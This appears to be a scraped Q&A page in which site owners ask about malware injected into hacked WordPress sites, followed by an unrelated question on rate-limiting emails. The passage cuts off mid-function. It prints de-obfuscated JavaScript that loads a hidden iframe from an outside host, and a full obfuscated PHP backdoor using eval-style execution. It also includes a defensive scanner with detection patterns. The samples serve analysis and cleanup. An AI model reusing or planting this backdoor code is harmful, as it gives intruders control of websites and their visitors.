How to find malicious code/malware on a website [closed] - php

My Wordpress website recently became infected with malware and has been blacklisted. I thought I fixed it by updating the site and plugins and removing any code I didn't recognize.
I then used Sucuri Site Checker and it seemed okay, so I submitted a review request with Google. However, Google have said that it still contains malware in the form of malicious code (they referred to it as a code injection).
I am a bit lost for what to do. Is there a way to find the bit of code which Google is finding? The domain is sudorf.co.uk but it has malware so I wouldn't advise going there - no idea what the malware will be doing.
Any help would be greatly appreciated.
EDIT: I found that code a few days ago and deleted it, then I updated all versions etc. But obviously it has come back again. Does anyone have an idea how it might be getting there? My thoughts are that it's either from a plugin - which is why I am going to remove all of them. The other is the contact form - but I didn't think this would have allowed them to edit the header.php.

This is pure info. Your malware looks like this when it's de-obfuscated:
function k09() {
var static = 'ajax';
var controller = 'index.php';
var k = document.createElement('iframe');
k.src = 'http://dostojewskij-gesellschaft.de/VD49Jdzr.php';
k.style.position = 'absolute';
k.style.color = '512';
k.style.height = '512px';
k.style.width = '512px';
k.style.left = '1000512';
k.style.top = '1000512';
if (!document.getElementById('k')) {
document.write('<p id=\'k\' class=\'k09\' ></p>');
document.getElementById('k').appendChild(k);
}
}
function SetCookie(cookieName, cookieValue, nDays, path) {
var today = new Date();
var expire = new Date();
if (nDays == null || nDays == 0) nDays = 1;
expire.setTime(today.getTime() + 3600000 * 24 * nDays);
document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}
function GetCookie(name) {
var start = document.cookie.indexOf(name + "=");
var len = start + name.length + 1;
if ((!start) &&
(name != document.cookie.substring(0, name.length))) {
return null;
}
if (start == -1) return null;
var end = document.cookie.indexOf(";", len);
if (end == -1) end = document.cookie.length;
return unescape(document.cookie.substring(len, end));
}
if (navigator.cookieEnabled) {
if (GetCookie('visited_uq') == 55) {} else {
SetCookie('visited_uq', '55', '1', '/');
k09();
}
}
http://dostojewskij-gesellschaft.de/VD49Jdzr.php simply outputs "OK".
Why?
My guess is that this is an IP/traffic logger. Maybe for the hackers to check which blogs are most active and then later come back and hack that particular site (no need to waste time on a site with 2 visitors a month). This is good and bad.
The good part is that it seems that they haven't used any of your user database or anything else.
The bad part is that they might very well have downloaded your entire database since they've obviously had executing rights on your server, and might've placed their PHP files all over your server. Your best bet is to start on a fresh WP and copy plugins/themes in one-by-one while manually checking them.
Change all passwords. Even your DB login. Consider everything compromised.

Related

Wordpress site hacked: Un obfuscate malicious code [closed]

One of the sites I manage got hacked through a WordPress install in the shared environment.
It looks like some malware has been injected into all the PHP files on the server. I've managed to delete all references of the code and changed all the passwords. Subsequently I've been getting failed login attempts from an IP in the Ukraine...
<?php
if (!isset($GLOBALS["\x61\156\x75\156\x61"]))
{
$ua = strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]);
if ((!strstr($ua, "\x6d\163\x69\145")) and(!strstr($ua, "\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"] = 1;
}
?>
<?php
$vkvmlmaavg = 'zbssb!-#}#)fepmqnj!%x5c%x782f!#0#)idubn%x5c%x7860hfs%x7860%x5c%x7825}X;!sp!*#opo#>>}R%x5c%x7825)7fmji%x5c%x78786<C%x5c%x7827&6N}#-!tussfw)%x5c%x7825c*W%x5c%x7825eN+#Qi%x5c%x785c1^W%x5c%x78x5c%x782fq%x5c%x7825>2q%x5c%x7825<#x28%141%x72%162%x61%171%x5f%155%x61%160%x28%42%x6c%x7827!hmg%x5c%x7825)!gj!|!*1?hmg%x5g6R85,67R37,18R#>q%x5c%x7825V<*#fopoV;hojepdo;msv}.;%x5c%x782f#%x5c%x782f#%x5c%x782f},;#-#}+;%x5c%x7825-qp%xMPT7-NBFSUT%x5c%x7860LDPT7-U256]y6g]257]y86]267]y74]275]y7:]<*)ujojR%x5c%x7827id%x5c%x78256<%x5c%x787fw6*%x5c%x78{e%x5c%x7825)!>>%x5c%x7822!ftmbg)!gj<*#k#)usbut%x5c%x7860cpV%x5c%*72!%x5c%x7827!hmg%x5c%x7825)!gj!<2,*j%x5c%x782f#00;quui#>.%x5c%x7825!<***f%x5c%x7827,*]y6gP7L6M7]D4]275]D:M8]Df#<%x5c%x7825tdz>#L4]275L3osvufs:~:<*9-1-r%x5c%x7825)s%x5c%x780{66~6<&w6<%x5c%x787fw6*CW&)7gj6<*doj%x5c%x78257-K)udfoopdXA%x5c%x7822)7gj6<*QDU%x5c%x7860825-bubE{h%x5c%x7825)sutcc%x7824]25%x5c%x7824-%x5c%x7824-!c%x7825%x5c%x787f!<X>b%x5c%x7825Z334}472%x5c%x7824<!%x5c%x7825mm!>!#]y81]273]y76]258]y6g]27fbuf%x5c%x7860gvodujpo)##-!#~<#%x5c%x782f%x5c%x7825%x5c%x7824-%x5c%x78:|:**#ppde#)tutjyf%x5c%x78604%x5c%x78223}!+!<+{e%x5c%x7825+*5c%x785cq%x5c%x7825)ufttj%x5c%x7822)gj6<^#Y#%x5c%x785cq%x5c%x7825%x5c%c%x7825>U<#16,47R57,27R66,#%7825<#762]67y]562]38y]572]48y]#>m%x5c%x7825:|:*r%x5c%x7825:-t%x5c%x782*#sfmcnbs+yfeobz+sfwjidsb%x5c%x7860bj+upcotn+qsvmt+fmhpph#)y81]265]y72]254]y76]61]y33]6#]y76]277]y72]265]y39]274]y85]273]yq)!sp!*#ojneb#-*f%x5c%x7825)sf%x5c%x7878pmpusut)tpqssutRe%x5c%xyf%x5c%x7860opjudovg%x5c%x7822)!gj}1~!<2p%x5c%x7825%x5c%c%x7824-%x5c%x7824gvodujpo!%x5c%x7824-%x5c%x7824y7%x5c%x7826<C%x5c%x7827pd%x5c%x78256|6.7eu{66~67<&w6<*&7-#o]if((function_exists("%x6f%142%x5f%163%x74%141%x72%164"%x5c%x787fw6<*K)ftpmdXA6|7**197-2qj%)%x5c%x7825bbT-%x5c%x7825bT-%x5c%x7825hW~%x5c%x7825fdy)#Z6<.4%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.3%x5c%x78c%x7825l}S;2-u%x5c%x7825!-#2#%x5c%x782f#5c%x7825)dfyfR%x5c%x7827tfs%x5c%x78256<*17-SFEBFI,6<*1x5c%x7824%x5c%x785c%x5
c%x7825j^%x5c%x7824-%x5c%x7824tvctus)%x5c%x78.973:8297f:5297e:56-%x5c%x7878r.985:c%x7825)!gj!<**2-4-bubE{h%x5c%x7825)sutcvt)esp>5!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825)sutcvt)!gj!|!*bubE{hx782f%x5c%x7825kj:-!OVMM*<(<%x5c%x78e%x5c%x78b%x5c%x825)euhA)3of>2bd%x5c%x7825!<5h%x5%x5c%x7825%x5c%x782fh%x5c%x7825)n]58y]472]37y]672]48y]#>s%x5c%x7825<#462]47y]252]18y]#>q%x5c%x78256<*Y%x5c%x7825)fnbozcYufhA%x5c%x78272qj%x5c%x78256<^#zsfvr#%x55c%x7825)54l}%x5c%x7827;%x5c%x7825!<*#}_;#)323ldfid>}&;!osvufs}%x5c%c%x7825h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.93e:5597f-sf*#npd%x5c%x782f#)rrd%x5c%x78%x7824-%x5c%x7824]y8%x5c%x7824-%x5c%x7824]26%x5c%x5)!gj!~<ofmy%x5c%x7825,3,j%25>%x5c%x782fh%x5c%x7825:<**#57]38y]47]67y]37]88y]27]28y]#%x5c%x782frx7824-%x5c%x7824*<!~!ds]82]y76]62]y3:]84#-!OVMM*<%x22%51%x29%51%x29%7x7827Y%x5c%x78256<.msv%x5c%x7860ftsbqA7>q%xun>qp%x5c%x7825!|Z~!<##!>!2p%x5c%x7825!|!*2qj%x5c%x7825)hopm3qjA)qj3hopmA%x5c%x78273qj%x5c%x}%x5c%x7878;0]=])0#)U!%x5cx5c%x7822#)fepmqyfA>2b%x5c%x7825!<*qp%x5c%x7825-*.%x5c%x76g]273]y76]271]y7d]252]y74]256]y39]252]y83]273]y72]y83]273]y76]277#<%x5c%x7825t2w>#]*!***b%x5c%x7825)sf%x5c%x7878pmpusut!-#j0#!%x5c%x782f!*>:r%x5c%x7825:|:**t%x5c%x7825)m%x5c%x7825=*h%x5c%x7825)m%x5c%x7825):;y]}R;2]},;osvufs}%x5c%x7827;mnui}&;zepc}A;~!}%x5c%x787f;!|!}{;)gj}l;33bq}k;opjudovg2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpetj{fpg)%x5c%x7825%x5c%7f_*#[k2%x5c%x7860{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopw6<%x5c%x787fw6*CWtfs%x5c%x7825)7gj6<*id%x5c%x7825)ftpmdR6<*id%x34]342]58]24]31#-%x5c%x7825tdz*Wsfuvso!%x5c%x7825bss%x5c%x785csboe%x5c%x7825s:%x5c%x785c%x5c%x7825j:^<!ufs:~928>>%x5c%x7822:ftmbg39*56A:>c%x7860TW~%x5c%x7824<%x5c%x78ex5c%x787f!>>%x5c%x7822!pd%x5c%x7:55946-tr.984:75983:48984:71TW%x5c%x7825hIr%x5c%x785c1^-%x5c%x7825r%x5c%x785c2^-%x5c%x7825hOh%x5c%25-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5qmbdf)%x5c%x7825%x5c%x7824-%x5c%x7824y4%x5c37]278]225]241]334]368]32mgoj{h1:|:*mmvo:>:iuhofm%x5c%x7825:-5ppde:4x7827K6<%x5c%x787fw6*3qj%x5c%x78257>%x5c%x78227
2qj%x5c%x7825)7gj6<*x5c%x78257-C)fepmqnjA%x5c%x7827&6<.fmjgQUUI&e_SEEB%x5c%x7860FUPNFS&d_SFSFGFS%x5c%x7860QUUI&c_UOFHB%x5c%x78268]y7f#<!%x5c%x7825tc%x785cq%x5c%x78257%x5c%x782f7###7%xx7860{6~6<tfs%x5c%x7825.[A%x5c%x7827&6<%x5c%x787fw6*%x5c%x78tpI#7>%x5c%x782f7rfs%x5c%x78256<#o]1%x5c%x782sv%x5c%x78256<C>^#zsfvr#%x5c%x785cq%x5c%x78257**^#zsfvr#%x%x5c%x7825w%x5c%x7860%x5c%x785c^>Ew:Qb:Qc:W~!%x5c%x7825z!>2<!gps)%x5c%d%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt%x5c%x7860SFTV%x5c%x7860QUUI&b%x5c%x7825tww**WYsboepn)%x5c%x7825bss-%x5c%x7825r%x5c%x7878B%x525z>3<!fmtf!%x5c%x7825z>2<!%x5c%x7825ww2)%x5c%x7825w%x525zW%x5c%x7825h>EzH,2W%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c%x7825rN}#Qw]248L3P6L1M5]D2P4]D6#<%x5c%x7825G]y6d7825>j%x5c%x7825!*3!%x5c%x7827!hmg%x5c%x7825!)!52985-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#%x5c%x782f#7e*?]+^?]_%x5c%x785c}X%x5c%x7824<!%x5c%x7825tzw>!7824-%x5c%x7824<%x5c%x7825j,,*!|%x5%x5c%x7825)j{hnpd!opjudovg!|!**#j{hnpd#)tutj3]y76]271]y7d]252]y74]256#<!%x5c%x7825ff2!>!bssbz)%x5c:>1<%x5c%x7825b:>1<!gps)%x5c%x7825j:>1<%x5c%x7825j:~!!%x5c%x7825s:N}#-%x5c%x7825o:W%x5c%x7825mfV%x5c%x787f<*XAZASV<*w%x5c%x7825)ppde>u%x5c%x7825V<#65,47R2ov{h19275j{hnpd19275fub%x5c%x7824-%x5c%x7824-tusqpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824!>!tus%x5c%x7860sfbqov>*ofmy%x5c%x7825)utjm!|!*5!%x525s:%x5c%x785c%x5c%x7825j:.2^,%x5c%x7825b:<!%x5c%x7825c:>27-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%x5c%x78257-MSV,6FOJ%x5c%x7860GB)fubfsdXA%x5c%452]88]5]48]32M3]317]445]212]445]fmji%x5c%x7878:<##:>:h%x5c%x724!>!fyqmpef)#%x5c%x7824*<!%x5c%x7825kj:!>!#]y3d]51]y35]256]y76]760hA%x5c%x7827pd%x5c%x782%x5c%x7825-#+I#)q%x5c%x7825:vt)fubmgoj{hA!osvufs!~<3,j%x5c%x_GMFT%x5c%x7860QIQ&f_UTPI%x5c%x78605)3of:opjudovg<~%x5c%x7824<!%x5c%x7825o:!>!%x5c%x78242178}527}88:}%x5c%x7825#%x5c%x782f#o]#%x5c%x782f*)323zbe!-#jt0x787f%x5c%x787f%x5c%x787F.uofuopD#)sfebfI{*w%x5c%x7825)kV%x5c%x7878{**#k#)tutjyf%x5c%x7860x5c%x7825>j%x5c%x7825!<**3-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt-#w#)ld2]y3d]51]y35]274]y4:]82]y3:]62]y4c#<!%x5c%x782
5t::!>!%x5c%x78825)!gj}Z;h!opjudovg}{;#)tutjyf%x5c%x7860opjudovg)!gj!|!*msv%x5c%x786%x21%76%x21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y3:]6f%x5c%x787f<u%x5c%x7825V%x5c%x7827{ftmfV%x5c%x787f<*X&Z&S{ft4-%x5c%x7824*<!%x5c%x7824-%x5c%x7824gps)%x5c%x7825j>1<%x5c%x7825j=turn chr(ord($n)-1);} #error_reporting(0); preg_replace("%x2f%50%]281Ld]245]K2]285]Ke]525cIjQeTQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x782%x5c%x78b%x5c%x7825mm)%x5c%x7825%x5c%x7878:-!%x58]y76#<%x5c%x78e%x5c%x78b%x5c%x7825w:!>!%x5c%x78246767~6<Cw6}.;%x5c%x7860UQPMSVD!-id%x5))) { $GLOBALS["%x61%156%x75%156%x61"]=1; function fjfgg($n){re25)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%x5c%x74+9**-)1%x5c%x782f2986+7**^%x5c%x782f%x5c%x7825r%x5c%x7878<7825ggg!>!#]y81]273]y76]258]y6g]273]y76]271]y7d]#p#%x5c%x782f%x5c%x7825z<jg!)%x5c%x7825z>>2*!%x5c%x78c%x7822)gj!|!*nbsbq%x5c%x7825)323ldfidk!~!<**qp%x5c%x7825!-uc%x7825)uqpuft%x5c%x7860msvd},;uqpuft%x5c%x7860msvd}+;!>%x5c%x7825!|!*)323zbek!~!<b%x5#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*%x5c%x7824%x5c%825:<#64y]552]e7y]#>n%x5c%x7825<#37224Ypp3)%x5c%x7825cB%x5c%x7825igj!<2,*j%x5c%x7825!-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!:8:|:7#6#)tutjyf%x5c%x7860439275ttfsqnpd]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%y74]273]y76]252]y85]c%x7825%x5c%x782f#0#%x5c%x782e%x5c%x7827,*d%x5c%x7827,*c%x5c%x7827,54]y76#<%x5c%x7825tmw!>!#]y84]27525c!>!%x5c%x7825i%x5c%x785c2^<!Ce*[!%x5c%x78hmg%x5c%x7825!<12>j%x5c%x782#-!#~<%x5c%x7825h00#*<%x5c%x7825nfd)##Qtpz)#]341]88M4P8]3", NULL); 
}4%162%x5f%163%x70%154%x69%164%50%x22%134%x78%62%x35%165%x3a%14252]y74]256#<!%x5c%x7825ggg)(0)%x5c%x782f+*0f(-!#]yx785cq%x5c%x7825%x5c%x7827j>5h%x5c%x7825!<*::::::-111112)eobs%x5c%x78608]y34]68]y33]65]y31]53]y6d]281]y43]78]y33]65]y31]55]y85gpf{jt)!gj!<*2bd%x5c%x7825-#1GO%x7825nfd>%x5c%x7825fdy<Cb*[%x5c%x7825h!>!%x5c%x7825tdz%x5c%x7878%x5c%x7822l:!}V;3q%x5c%x7825}Ux787f;!opjudovg}k~~9{d%x5c%x7825:osv*b%x5c%x7827)fepdof.)fepdof.%x5c%x782f###%x5c%x782fqp%x5c%x7825x2e%52%x29%57%x65","%x65%166%x61%154%x28%151%x6d%160%x6c%157%x64%145%<*rfs%x5c%x78257-K)fujs%x5c%x7878X6<#o]o]Y%x5c%x78257;uA%x5c%x7827doj%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fmjgk4%x5c%]282#<!%x5c%x7825tjw!>!#]y84]275]y83]248]y83]256]y81]265]y72]2]D6#<%x5c%x7825fdy>#]D4]273]D6P2L5P6!2p%x5c%x7825!*3>?*2b%x5c%x7825)7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<*#cdc%x7825b:>1<!fmtf!%x5c%x7825b:>%x5c%x78=tj{fpg)%x5c%x7825s:*<%x5c%x7825j:,,Bjg!)%x5c%x7825j:>>1*!%x5%x7827{**u%x5c%x7825-#jt0}Z;0]=]0#)2q%x5x7825j>1<%x5c%x7825j=6[%x5c%x7825ww2!>#p#%x5c%x782f5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fubfsdXk5%x5c%x786x5c%x7825tpz!>!#]D6M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%x782f#M5]DgP56%152%x66%147%x67%42%x2c%163%x73Ld]53]Kc]55Ld]55#*<%x5c%x7825bG9}:}.}-}!#*<%x5c%s]o]s]#)fepmqyf%x5c%x7827*&7-n%x5c%x7825)utjm6<%x5c%x787fw6*CW&)7gj65,d7R17,67R37,#%x5c%x782fq%x556<pd%x5c%x7825w6Z6<.2%x5c%x7860hA%x5c%x7827pd%x5c%x7825x787f!~!<##!>!2p%x5c%x7825Z<^2%x5c%x785c2b%x5c%x7825!>76]277]y72]265]y39]271]y83]256]y78]248]y83]256]25}K;%x5c%x7860ufldpt}X;%x5c%x7860msvd}R;*msv%x5c%x7825)x7825!osvufs!*!+A!>!<#opo#>b%x5c%x7825!*##>>X)!gjZ<#opo#>b%x5c%x7825!**X)ufttj%x5%x5c%x7825%x5c%x7824-%x5c%x7824*!|!%x5c%x7824-%))1%x5c%x782f35.)1%x5c%x782f12]3]364]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67]%x5c%x7878W~!Ypp2)%x5c%x7825zB%x5c%x7825z>!tussfw)%x5c%x78<pd%x5c%x7825w6Z6<.5%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6ww!>!%x5c%x782400~:<h%x5c%x7825_t%x5c%x7825:|!*uyfu%x5c%x7827k:!ftmf!}Z;^nbsbq%x5c%x7825%x5c%x785cSFWSFT%x5cc%x7825tzw%x5c%x782f%x5c%x
7824)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#Kc%x7825!*9!%x5c%x7827!hmg%x5c%x782yfu%x5c%x7825)3of)fepdof%x5c%x786057ftbc%x5c%x787f!5r%x5c%x7878Bsfuvso!sboepn)%x5c%x7825epnbss-%x5c%x7825r!}%x5c%x7827;!>>>!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;!osvufs}w;*%) && (!isset($GLOBALS["%x61%156%x75%156%x61"])5c%x782f7^#iubq#%x5c%x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82#-#!#-%x5c%x7825tmw)f20QUUI7jsv%x5c%x78257UFH#%x5c%x7827rfs%x5c%x78256~6<<*K)ftpmdXA6~6<u%x5c%x78257>%x5c%x782f7&6|7**111127-K)ebfsX%x5c%x7827u25%x5c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#}#-#!*+fepdfe{h+{d%x5c%x7825)+opjudovg+)!gj+{e%x5c%7f_*#ujojRk3%x5c%x7860{666~6<&w6<%x5c%x787fw6*CW&)7gj6<43]321]464]284]364]6]2/(.*)/epreg_replacekjfgnktllk';
$acpbcdcqwr = explode(chr((169 - 125)), '1655,54,9690,46,6518,63,6253,65,7910,69,223,49,8581,31,7446,62,6068,59,6431,60,9241,70,1801,68,5545,25,8758,56,1605,50,8661,68,9867,70,85,41,7979,55,4228,45,9814,53,1709,36,806,52,417,28,5389,29,3938,67,2879,51,2355,66,4132,36,9736,21,7559,27,4273,58,1137,70,2795,43,8459,54,768,38,4005,39,8034,63,4168,23,3430,64,1909,54,5334,55,477,53,10029,55,4191,37,3375,55,4401,43,8915,56,6491,27,6844,56,9624,66,3661,32,6000,68,6581,43,858,25,5598,32,4686,47,7049,61,595,46,3791,36,9484,34,2630,27,5870,69,5243,34,272,37,2066,47,7350,28,2113,63,4884,44,1490,56,8814,54,8195,32,7685,32,2956,57,2228,33,7206,29,2551,29,641,41,7235,38,7847,63,7586,44,2838,41,3097,55,1305,59,0,52,1427,63,8227,41,3304,49,5630,35,4044,67,4444,22,6900,30,916,33,8991,61,6784,60,9518,51,9355,64,52,33,354,63,2421,68,7811,36,3597,34,7110,40,5136,23,3895,43,1077,60,9982,47,8971,20,530,65,5780,24,6127,60,5075,61,8729,29,1207,28,188,35,309,45,5804,66,7771,40,3220,30,3250,54,2930,26,8368,40,1869,40,5731,49,4802,47,1392,35,3013,50,8097,62,7273,33,3063,34,7186,20,445,32,4111,21,9311,44,732,36,2657,69,2261,33,5570,28,3152,68,5451,29,6983,36,2294,61,1235,70,5665,66,949,58,4928,53,883,33,9052,47,1963,67,9937,45,5159,38,5197,46,3827,43,2580,50,4849,35,1546,59,6187,66,3353,22,2726,23,1007,70,5480,65,5939,61,7019,30,126,62,7306,44,6340,43,9569,55,9183,58,4584,65,3721,70,9757,57,4466,63,2489,62,2030,36,4733,69,3693,28,7150,36,8513,68,8159,36,682,50,4649,37,6318,22,8612,49,7717,54,1745,56,7378,56,3870,25,9128,55,5418,33,10084,22,3494,66,9099,29,6624,59,5033,42,4981,52,8307,61,8268,39,5277,57,3560,37,4331,70,8408,51,6731,53,4529,55,3631,30,6383,48,9419,65,6930,53,2176,52,6683,48,7508,51,8868,47,1364,28,7630,55,2749,46,7434,12');
$krdnhuyxrk = substr($vkvmlmaavg, (38379 - 28273), (35 - 28));
if (!function_exists('bvbkmkuetp'))
{
function bvbkmkuetp($lkmdhuzumr, $syqugkbwaa)
{
$wkmwfztjxy = NULL;
for ($wpopdgyvwt = 0; $wpopdgyvwt < (sizeof($lkmdhuzumr) / 2); $wpopdgyvwt++)
{
$wkmwfztjxy .= substr($syqugkbwaa, $lkmdhuzumr[($wpopdgyvwt * 2)], $lkmdhuzumr[($wpopdgyvwt * 2) + 1]);
}
return $wkmwfztjxy;
};
}
$knticqyoeu = "\x20\57\x2a\40\x62\170\x71\151\x75\171\x62\146\x6d\160\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\60\x36\55\x31\66\x39\51\x29\54\x20\143\x68\162\x28\50\x35\71\x30\55\x34\71\x38\51\x29\54\x20\142\x76\142\x6b\155\x6b\165\x65\164\x70\50\x24\141\x63\160\x62\143\x64\143\x71\167\x72\54\x24\166\x6b\166\x6d\154\x6d\141\x61\166\x67\51\x29\51\x3b\40\x2f\52\x20\167\x68\156\x75\164\x6c\152\x78\153\x70\40\x2a\57\x20";
$lrykfpczcb = substr($vkvmlmaavg, (55025 - 44912), (61 - 49));
$lrykfpczcb($krdnhuyxrk, $knticqyoeu, NULL);
$lrykfpczcb = $knticqyoeu;
$lrykfpczcb = (376 - 255);
$vkvmlmaavg = $lrykfpczcb - 1;
?>
My question is, what does this code do? I have tried quite a few obfuscation tools but to no avail. Is anyone able to help decipher this?
This question has been answered in another Stack Exchange site: https://security.stackexchange.com/questions/70579/is-this-a-backdoor
Excerpts from that answer:
This piece of highly obfuscated code contains a program to allow the hacker to dynamically append any HTML or javascript
...
It appears that a Wordpress vulnerability was introduced by an unpatched version of the MailPoet plugin
...
The key takeaway from this incident is to backup your data frequently and update your software conscientiously
Answered by https://security.stackexchange.com/users/9312/question-overflow
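One way to look for code like the two samples above across a whole site, as an added example that is not part of the original posts: a PHP command-line scanner that flags the traits both samples show (runs of \x and octal escapes, %x blobs, chr() arithmetic, script-created iframes) and decodes escaped strings to reveal calls hidden inside them. The rule names, patterns and thresholds are assumptions and will need tuning per site.

```php
<?php
// Added example (not from the original posts). Heuristic scanner for the
// obfuscation traits visible in the samples on this page. Rule names,
// patterns and thresholds are assumptions; expect to tune them per site.

// rule name => [regex, minimum number of matches before the rule fires]
const RULES = [
    // Runs of hex/octal escapes such as "\x61\156\x75\156\x61"
    'escaped-string'   => ['/(?:\\\\x[0-9a-f]{2}|\\\\[0-7]{2,3}){5,}/i', 1],
    // Payload blobs made of %xNN tokens
    'percent-hex-blob' => ['/%x[0-9a-f]{2}/i', 20],
    // chr() fed by arithmetic, e.g. chr((169 - 125))
    'chr-arithmetic'   => ['/\bchr\s*\(\s*\(?\s*\d+\s*[-+]\s*\d+/i', 1],
    // iframe created from script, as in the de-obfuscated k09() function
    'script-iframe'    => ['/createElement\s*\(\s*[\'"]iframe[\'"]\s*\)/i', 1],
];

/** Return the rules that fire for one file's contents. */
function scan_source(string $code): array
{
    $hits = [];
    foreach (RULES as $name => [$pattern, $min]) {
        $count = preg_match_all($pattern, $code);
        if ($count !== false && $count >= $min) {
            $hits[$name] = $count;
        }
    }
    // Decode every escaped run and look for calls hidden inside it.
    preg_match_all(RULES['escaped-string'][0], $code, $runs);
    $hidden = [];
    foreach ($runs[0] as $run) {
        $plain = stripcslashes($run); // understands \xNN and octal escapes
        if (preg_match_all('/\b(eval|assert|create_function|preg_replace)\s*\(/i', $plain, $calls)) {
            foreach ($calls[1] as $fn) {
                $hidden[strtolower($fn)] = true;
            }
        }
    }
    if ($hidden) {
        $hits['hidden-call'] = array_keys($hidden);
    }
    return $hits;
}

/** Walk a directory and report every script file with at least one hit. */
function scan_tree(string $root): array
{
    $report = [];
    $files = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($files as $file) {
        if (!$file->isFile() || !preg_match('/\.(php\d?|phtml|inc|js)$/i', $file->getFilename())) {
            continue;
        }
        // Read at most 2 MiB per file; injected code sits at the top in both samples.
        $code = @file_get_contents($file->getPathname(), false, null, 0, 2 * 1024 * 1024);
        if ($code === false) {
            continue;
        }
        $hits = scan_source($code);
        if ($hits) {
            // The modification time helps to spot files that were re-infected.
            $report[$file->getPathname()] = $hits + ['mtime' => date('c', $file->getMTime())];
        }
    }
    return $report;
}

if (PHP_SAPI === 'cli') {
    if (isset($argv[1])) {
        foreach (scan_tree($argv[1]) as $path => $hits) {
            echo $path, ' ', json_encode($hits), PHP_EOL;
        }
    } else {
        // Constructed sample assembled from short fragments quoted on this page.
        $sample = '<?php if (!isset($GLOBALS["\x61\156\x75\156\x61"])) {}' . "\n"
                . '$parts = explode(chr((169 - 125)), "1655,54");' . "\n"
                . '$code = "\x65\166\x61\154\x28";';
        print_r(scan_source($sample));
    }
}
```

Run it with the site's document root as the only argument; every hit is a candidate for manual review, not a verdict.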

Dynamic Time for PHP Website [closed]

I am working on making a website for my group that hosts a couple of game servers. In the process I have made a website that pings the server, and in return displays whether it is up or down. I want to be able to say that if it is down, you can email me. That part works. What I don't want is for a user to be able to keep emailing me, after they sent it once.
I was wondering if I can somehow make a script so that when any user clicks the link to email me, NO other user can email me for about another hour. I figure this would have to be something server-side. I made a script in the past, and it works: it adds one hour when someone clicks the link. Problem is when said user goes back to that directory, they can click it again because the time did not save. I also want it so that if multiple users click on the link at the same time it only adds 1 hour, not multiple (Example, 3 users are at the website, 2 users click the notify, it would add 2 hours instead of just 1.)
Any hints in the right direction would be great. I thought about using MySQL but don't want to unless absolutely needed (Don't know how possible it is with our Database setup)
One other option would be to have a file sitting somewhere on the server that contains a file with the time of the last sent message written inside of it, then comparing that to the current time. Here's a rough example (note that the example is not secure and needs to be sanitized before accepting raw user input, but hopefully it'll point you in the right direction):
<?php
send_email();

function maindir() {
    // This will need to be set to the directory containing your time file.
    $cwd = '/home/myusername/websites/example.com';
    return $cwd;
}

function update_timefile() {
    $cwd = maindir();
    // The file that will contain the time.
    $timefile = 'timefile.txt';
    $time = time();
    file_put_contents("$cwd/$timefile", $time);
}

function send_email() {
    // Note: this should be sanitized more and have security checks performed on it.
    // It also assumes that your user's subject and message have been POSTed to this
    // .php file.
    $subject = ($_POST && isset($_POST['subject']) && !empty($_POST['subject'])) ? $_POST['subject'] : FALSE;
    $message = ($_POST && isset($_POST['message']) && !empty($_POST['message'])) ? $_POST['message'] : FALSE;
    if ($subject && $message) {
        $to = 'me@example.com';
        $cwd = maindir();
        $timefile = 'timefile.txt';
        // Current time
        $timenow = time();
        // Read the time from the time file (treated as 0 if the file does not exist yet)
        $timeget = is_file("$cwd/$timefile") ? (int) file_get_contents("$cwd/$timefile") : 0;
        // Calculate the difference
        $timediff = $timenow - $timeget;
        // If at least 3600 seconds have passed since the last message...
        if ($timediff >= 3600) {
            // ... and if the message gets sent...
            if (mail($to, $subject, $message)) {
                // ... update the time file.
                update_timefile();
            }
        }
    }
}
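The time-file approach from the answer above with its two gaps closed, as an added example that is not the answerer's code: the check and the update happen under one exclusive flock(), so simultaneous clicks start only one cooldown, and control characters are stripped from the subject so POSTed text cannot add mail headers. STATE_FILE, NOTIFY_TO, COOLDOWN and the function names are assumptions.

```php
<?php
// Added example, not the answerer's code. One notification per hour for all
// visitors combined. STATE_FILE, NOTIFY_TO and COOLDOWN are assumed values.

const STATE_FILE = '/home/myusername/private/last_notify.txt'; // outside the web root
const NOTIFY_TO  = 'me@example.com';
const COOLDOWN   = 3600; // seconds

/** Replace CR/LF and other control characters, then cap the length. */
function clean_subject(string $s): string
{
    return substr(trim(preg_replace('/[\x00-\x1F\x7F]+/', ' ', $s)), 0, 120);
}

/**
 * Run $send at most once per $cooldown seconds across all requests.
 * Returns true only for the request that actually sent the notification.
 */
function notify_once_per_window(string $stateFile, int $now, int $cooldown, callable $send): bool
{
    $fh = fopen($stateFile, 'c+'); // create if missing, never truncate on open
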